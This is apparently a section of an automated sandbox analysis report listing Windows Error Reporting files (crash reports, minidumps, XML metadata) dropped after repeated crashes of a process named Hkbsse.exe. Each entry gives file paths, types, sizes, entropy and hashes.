Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.3.4.7.5.8.7.1.2.2.2.7.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.0.1.5.7.4.3.8.-.a.a.3.8.-.4.f.1.f.-.8.6.2.2.-.7.b.a.3.d.f.d.c.c.a.0.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.2.3.5.e.4.d.0.-.3.a.3.5.-.4.5.6.f.-.b.3.6.9.-.d.f.d.b.2.7.a.2.f.5.5.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.H.k.b.s.s.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.c.4.-.0.0.0.1.-.0.0.1.5.-.2.b.9.a.-.f.1.4.f.7.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.d.9.b.6.f.b.6.0.9.6.e.f.4.a.d.4.3.e.5.7.2.1.7.0.6.0.e.2.a.1.5.0.0.0.0.f.f.f.f.!.0.0.0.0.8.5.6.e.9.6.8.8.e.3.e.0.8.7.4.8.9.d.6.d.4.e.f.0.2.b.7.3.1.7.d.3.c.b.c.1.f.f.f.7.!.H.k.b.s.s.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.8././.2.4.:.1.2.:.2.3.:.2.8.!.0.!.H.k.b.s.s.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Hkbsse.exe_eba6997ab32646c7c7813d2fb9eb324dd536044_37dd4795_3c380e22-e241-43a1-aad6-e99afce7738f\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8357254126137056
Encrypted:	false
SSDEEP:	96:OWOglsJhqSoA7Jf7QXIDcQnc6rCcEhcw3rj5x+HbHg/wWGTf3hOycoqzIPEVsPi6:O+l/p056rgjsnzuiFLZ24IO82Q
MD5:	72F2C4130857BBC410A16858E25CF4CD
SHA1:	F712CEDA1C4D586A43C00072081E1A414645DBD9
SHA-256:	3970D2B86D50DB79C3D357142E137E458BBA622D06DC78D17F2C6BD1241F92C2
SHA-512:	86E8B046806BB96AD0896EA0AE6240B8F70FE51AE9E04E4A3B8ED789EC6242665A4ECC41776EB643C2F047CC9B5D0F557745AB2397401217970F15AA67D437DC
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.3.4.7.5.9.3.5.3.2.4.9.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.c.3.8.0.e.2.2.-.e.2.4.1.-.4.3.a.1.-.a.a.d.6.-.e.9.9.a.f.c.e.7.7.3.8.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.3.d.2.d.f.4.c.-.9.0.0.8.-.4.3.8.2.-.8.2.8.b.-.e.1.d.6.b.7.e.c.e.4.f.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.H.k.b.s.s.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.c.4.-.0.0.0.1.-.0.0.1.5.-.2.b.9.a.-.f.1.4.f.7.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.d.9.b.6.f.b.6.0.9.6.e.f.4.a.d.4.3.e.5.7.2.1.7.0.6.0.e.2.a.1.5.0.0.0.0.f.f.f.f.!.0.0.0.0.8.5.6.e.9.6.8.8.e.3.e.0.8.7.4.8.9.d.6.d.4.e.f.0.2.b.7.3.1.7.d.3.c.b.c.1.f.f.f.7.!.H.k.b.s.s.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.8././.2.4.:.1.2.:.2.3.:.2.8.!.0.!.H.k.b.s.s.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Hkbsse.exe_eba6997ab32646c7c7813d2fb9eb324dd536044_37dd4795_4c7ebbfd-7867-4fd6-bea4-90c11f497f28\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8358841286071194
Encrypted:	false
SSDEEP:	96:0Q3tsJhqSoA7Jf7QXIDcQnc6rCcEhcw3rj5x+HbHg/wWGTf3hOycoqzIPEVsPiDX:h3t/p056rgjsnzuiFLZ24IO82Q
MD5:	D3375D366C247967683DE32CDE827BE9
SHA1:	0D5CB6C99CABCB4BA3364EC234A43785FA53BD08
SHA-256:	BE91B8DF8A3DC76FEC5D7FC47E02352FC9F4A0A9B261D56B252955432CA8E9DA
SHA-512:	381AAE4ACAE1A3B8236FB46DCDD116F0A2C2B6A5C4BDD725DBC9F154CD0909B84349C3EE98CCF874DCB12EB25DA5E23EE4EDE2FCF1CD718003E0198D61AAFA2D
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.3.4.7.6.0.5.6.6.2.7.6.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.c.7.e.b.b.f.d.-.7.8.6.7.-.4.f.d.6.-.b.e.a.4.-.9.0.c.1.1.f.4.9.7.f.2.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.d.2.f.8.8.c.a.-.6.8.3.a.-.4.c.3.7.-.8.d.6.e.-.d.6.0.a.c.b.9.6.d.9.8.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.H.k.b.s.s.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.c.4.-.0.0.0.1.-.0.0.1.5.-.2.b.9.a.-.f.1.4.f.7.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.d.9.b.6.f.b.6.0.9.6.e.f.4.a.d.4.3.e.5.7.2.1.7.0.6.0.e.2.a.1.5.0.0.0.0.f.f.f.f.!.0.0.0.0.8.5.6.e.9.6.8.8.e.3.e.0.8.7.4.8.9.d.6.d.4.e.f.0.2.b.7.3.1.7.d.3.c.b.c.1.f.f.f.7.!.H.k.b.s.s.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.8././.2.4.:.1.2.:.2.3.:.2.8.!.0.!.H.k.b.s.s.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Hkbsse.exe_eba6997ab32646c7c7813d2fb9eb324dd536044_37dd4795_851f73fb-58f1-4d29-b334-7b97668563bb\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7929012864687842
Encrypted:	false
SSDEEP:	96:tm0hqXsJhqSoA7Jf7QXIDcQnc6rCcEhcw3rj5x+HbHg/wWGTf3hOycoqzIPEVsP5:BqX/p056rgjsCzuiFmZ24IO82Q
MD5:	70A56F3478DC346F6FF1006AA879F51A
SHA1:	D3F148E0117C37F08778A1DE3DD12A159746DCA5
SHA-256:	DC255AC33266245B8F61170112F198A9179829A4DB48CFA2EE0BEC154F01B7A4
SHA-512:	6CD7B31D2D4F1B517E8BFDACC394C685FC71CCB9A9540C9A49622E196E87E72FACD27E167A13E960212684E2C021A904386A01D232823F6AC27ED7B01EB359F2
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.3.4.7.5.8.0.7.0.3.2.6.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.5.1.f.7.3.f.b.-.5.8.f.1.-.4.d.2.9.-.b.3.3.4.-.7.b.9.7.6.6.8.5.6.3.b.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.d.6.7.7.2.9.-.3.7.3.a.-.4.3.1.7.-.b.9.7.5.-.3.1.2.0.3.f.1.d.c.3.1.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.H.k.b.s.s.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.c.4.-.0.0.0.1.-.0.0.1.5.-.2.b.9.a.-.f.1.4.f.7.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.d.9.b.6.f.b.6.0.9.6.e.f.4.a.d.4.3.e.5.7.2.1.7.0.6.0.e.2.a.1.5.0.0.0.0.f.f.f.f.!.0.0.0.0.8.5.6.e.9.6.8.8.e.3.e.0.8.7.4.8.9.d.6.d.4.e.f.0.2.b.7.3.1.7.d.3.c.b.c.1.f.f.f.7.!.H.k.b.s.s.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.8././.2.4.:.1.2.:.2.3.:.2.8.!.0.!.H.k.b.s.s.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Hkbsse.exe_eba6997ab32646c7c7813d2fb9eb324dd536044_37dd4795_dc18c5db-f792-4e1c-860e-f893340d329f\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7787751218644507
Encrypted:	false
SSDEEP:	96:c5WapsJhqSoA7Jf7QXIDcQnc6rCcEhcw3rj5x+HbHg/wWGTf3hOycoqzIPEVsPip:zap/p056rgjsnzuiFmZ24IO82Q
MD5:	AC1D8405910B3ABFDEF7CDC0D1855657
SHA1:	2063BCB300AC533D7093394F94FB831921127D15
SHA-256:	D6C24470AA9AB1E7A34DB3CC966793D9A8EBEFBDA5ECCCB0A82FA57FF2BB752E
SHA-512:	9E42CA399E5DCF908AF3C634C4F5097C009B98A99BFEBBAE2914B1A95E66F8766F9FAF5055F989D8AF0515F3C33F3527B9D91A45A40AF96581A9B1290B4F2AA8
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.3.4.7.5.7.5.6.7.7.7.5.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.1.8.c.5.d.b.-.f.7.9.2.-.4.e.1.c.-.8.6.0.e.-.f.8.9.3.3.4.0.d.3.2.9.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.3.2.d.8.5.1.8.-.d.a.6.d.-.4.c.f.0.-.a.7.3.7.-.c.8.0.9.8.7.8.2.b.0.1.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.H.k.b.s.s.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.c.4.-.0.0.0.1.-.0.0.1.5.-.2.b.9.a.-.f.1.4.f.7.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.d.9.b.6.f.b.6.0.9.6.e.f.4.a.d.4.3.e.5.7.2.1.7.0.6.0.e.2.a.1.5.0.0.0.0.f.f.f.f.!.0.0.0.0.8.5.6.e.9.6.8.8.e.3.e.0.8.7.4.8.9.d.6.d.4.e.f.0.2.b.7.3.1.7.d.3.c.b.c.1.f.f.f.7.!.H.k.b.s.s.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.8././.2.4.:.1.2.:.2.3.:.2.8.!.0.!.H.k.b.s.s.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Hkbsse.exe_eba6997ab32646c7c7813d2fb9eb324dd536044_37dd4795_f91f5d24-188b-463e-b32d-bca6aaa9fa84\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7786876978674324
Encrypted:	false
SSDEEP:	96:eBHsHsJhqSoA7Jf7QXIDcQnc6rCcEhcw3rj5x+HbHg/wWGTf3hOycoqzIPEVsPip:YMH/p056rgjsnzuiFmZ24IO82Q
MD5:	24EE5A71C4BB58F6F10EEC6FB41D2EEF
SHA1:	836578C40BEA9A387630CCC653F3D3E5652EB511
SHA-256:	542A57D5D8F0D9632746A07829216DC138D8C5A4C541082CF49E8162083C8D78
SHA-512:	164EA31176E782A7F595B93A3F8977288859236351104315FE6ECF35CB7FF5AEFB110E02CD2473BC06B5F92B60BE634A78ECDBD8709E409F3513BDD5EBF36FE1
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.3.4.7.5.6.3.6.0.6.3.3.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.9.1.f.5.d.2.4.-.1.8.8.b.-.4.6.3.e.-.b.3.2.d.-.b.c.a.6.a.a.a.9.f.a.8.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.4.7.c.5.e.c.7.-.c.b.b.d.-.4.f.d.2.-.8.9.8.4.-.d.f.d.8.1.2.5.7.1.9.b.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.H.k.b.s.s.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.c.4.-.0.0.0.1.-.0.0.1.5.-.2.b.9.a.-.f.1.4.f.7.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.d.9.b.6.f.b.6.0.9.6.e.f.4.a.d.4.3.e.5.7.2.1.7.0.6.0.e.2.a.1.5.0.0.0.0.f.f.f.f.!.0.0.0.0.8.5.6.e.9.6.8.8.e.3.e.0.8.7.4.8.9.d.6.d.4.e.f.0.2.b.7.3.1.7.d.3.c.b.c.1.f.f.f.7.!.H.k.b.s.s.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.8././.2.4.:.1.2.:.2.3.:.2.8.!.0.!.H.k.b.s.s.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6EA1.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Aug 27 12:18:58 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	49020
Entropy (8bit):	2.068023749944294
Encrypted:	false
SSDEEP:	192:OoP3emXNduAyH171COzP4pGIGVJ8YSC+Hhte/9r/373qW7P8g5c3/eJnFDzhVz52:9WbAy7dzgWJ8YSBA9fBvS3/UDf5D
MD5:	798BF2F48881EF2D9ED987BF74B89731
SHA1:	7BB813F7050EEB8E7B0C6E654FC94D860DB07005
SHA-256:	9EEE73F4434FA2794382DFD623DBADBFC59E790454543273C8F82C46D0B70582
SHA-512:	0FD8141350A78EDC9CA87908284148F4C7CD43738AEC78C9F5CDA7284514B5383EAB02CBD13D7E6E6026DDAA6815A4263967892A445E2F6D2CD45F25344C4289
Malicious:	false
Preview:	MDMP..a..... .......2..f........................\...........<...4............+..........`.......8...........T...........................p...........\...............................................................................eJ..............GenuineIntel............T...........,..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6F4E.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8358
Entropy (8bit):	3.7028341081354665
Encrypted:	false
SSDEEP:	192:R6l7wVeJM1F9616Y2DGSU/MATgmf71eUpBt89bdeYsf0F/km:R6lXJ6f616YLSUpTgmfJep0Lf+
MD5:	5D84D9BD02EFA96F8B620B19F3929B5E
SHA1:	954301E4ECFA5AE40A6A9A17E49D9FE4F745806D
SHA-256:	86332C65108566A01AD93DB4E31C319EA9AB3255625BDFB742DFADDC126248A2
SHA-512:	B94454B333CB95315B1356603F8D6FD0CF9A8BB85E4203672ACFBCCAB48451464CD0DA0F264BDF1C6F91B1F9D76E324B269BBD5BBDAC323FF95695FB80020FCC
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.7.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6F7E.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4629
Entropy (8bit):	4.494683846686141
Encrypted:	false
SSDEEP:	48:cvIwWl8zsOJg77aI9g7WpW8VYJYm8M4JcN0F6po+q82F2axhQd:uIjfEI7eK7VBJc1oBUaxhQd
MD5:	2422EB80FF844A75A2264417E27ED958
SHA1:	85244489FD0EC95411B38020E71FD88E40EEE28A
SHA-256:	9279AA32BF04A99B983F76DBCD1382E68A324E6A3A0099C1ABDE2E3C52A4AD6B
SHA-512:	554096E8843786293D84DC5A6B73B69D6219C1E7C025F84259A678AA684C295577B55A03FB04300B48AC022C2992CBE6610580978CDFEDEB7E9EAC7C02C2CDAA
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="473961" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER718F.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Aug 27 12:18:59 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	61060
Entropy (8bit):	2.1690226460088673
Encrypted:	false
SSDEEP:	384:wV0l0Ndzpnq6snYS3pAmlg5xBvS3/kmF6K:8QqdzpnqvT5yxB2bZ
MD5:	014778799BB4D05A987EBEC59AEE0C4C
SHA1:	9D1A24108800FBC669FAC9267E394B098D9D2CEF
SHA-256:	73CA9C3F82E76818409E36351533B484141A64BA7F242B2DE879151BC662662D
SHA-512:	FA49B7C948BFA3523DE80372EE49486B3554900912F20BD4F2168D7DBEC8F6F72DFA8668F2AB6AB10125C90D58894260878AFAB1FA8CB50F93FD160E1BBD4779
Malicious:	false
Preview:	MDMP..a..... .......3..f....................................<................/..........`.......8...........T.......................................................................................................................eJ......h.......GenuineIntel............T...........,..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER721C.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8358
Entropy (8bit):	3.705744774799745
Encrypted:	false
SSDEEP:	192:R6l7wVeJM1Fi6z6Y2D8SUjMZgmf71eUpBT89bdnYsfcA/nm:R6lXJ6A6z6YRSUgZgmfJen9Lfs
MD5:	4A082EFB89C791734D8024A61FAAC2E5
SHA1:	0CC44DC679581DAF8BC4965348C00279A0175220
SHA-256:	AD948E04A779D39D064680E1ADF2D558F71286B35CD443EF8E8105858629F25E
SHA-512:	CE83B1047B0B8792AFB134106F7735B14D99429A125FD8EB2B7AE623CB253CF89E4C57DCFF6F621D94DA82D8CB53BFDD9F114BB72A98BCE3FEA3E105C8CE804B
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.7.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER73F2.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4629
Entropy (8bit):	4.497036514345702
Encrypted:	false
SSDEEP:	48:cvIwWl8zsOJg77aI9g7WpW8VYWYm8M4JcN0FQK+q82F2axhQd:uIjfEI7eK7VWJc7KBUaxhQd
MD5:	B53A84E14039C477B978B497C5DC4EE0
SHA1:	3195284E75F0BD64FC8AC74A14218CD4FB47CEB7
SHA-256:	4B1BE503584028516E114EF87FC9F80D3AEB6EC983B80D8F04378A521EBDDFC5
SHA-512:	BA05779D4333C72C25731CD42515CC3A5A81D52DD69E81D1730BB20AB7C72405849F0515FC1F4600450EB9000AACC67E37084BF6A8CFF7143A2F37FD2E726C65
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="473961" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7671.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Aug 27 12:19:00 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	77566
Entropy (8bit):	1.9965527077771037
Encrypted:	false
SSDEEP:	384:ozJjsXlQQdzpp/0OYsgYSM/RDOo5uMP+P2XJBvS3/YBLZFF:CJjylTdzpxd2TWZOo82s2ZB2WR
MD5:	4A466CA3148797FC45A67FF2A770333D
SHA1:	B2FAE3569003B31DD1F68061DF2EDFFB715C41D1
SHA-256:	A0B676A7D1F6E753BD6784C728AC930219E694BCBA63129588E2FF46AC24B813
SHA-512:	201B4ACDA8F1963D35252B0202F49C401A4E936246541191369507A821F6EF41D2062EDAF7C2968339BFAC60AEF77BA06ECE4631359D695F8DC2B4511B15C260
Malicious:	false
Preview:	MDMP..a..... .......4..f........................x...........<................9..........`.......8...........T...........H"..............L...........8...............................................................................eJ..............GenuineIntel............T...........,..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

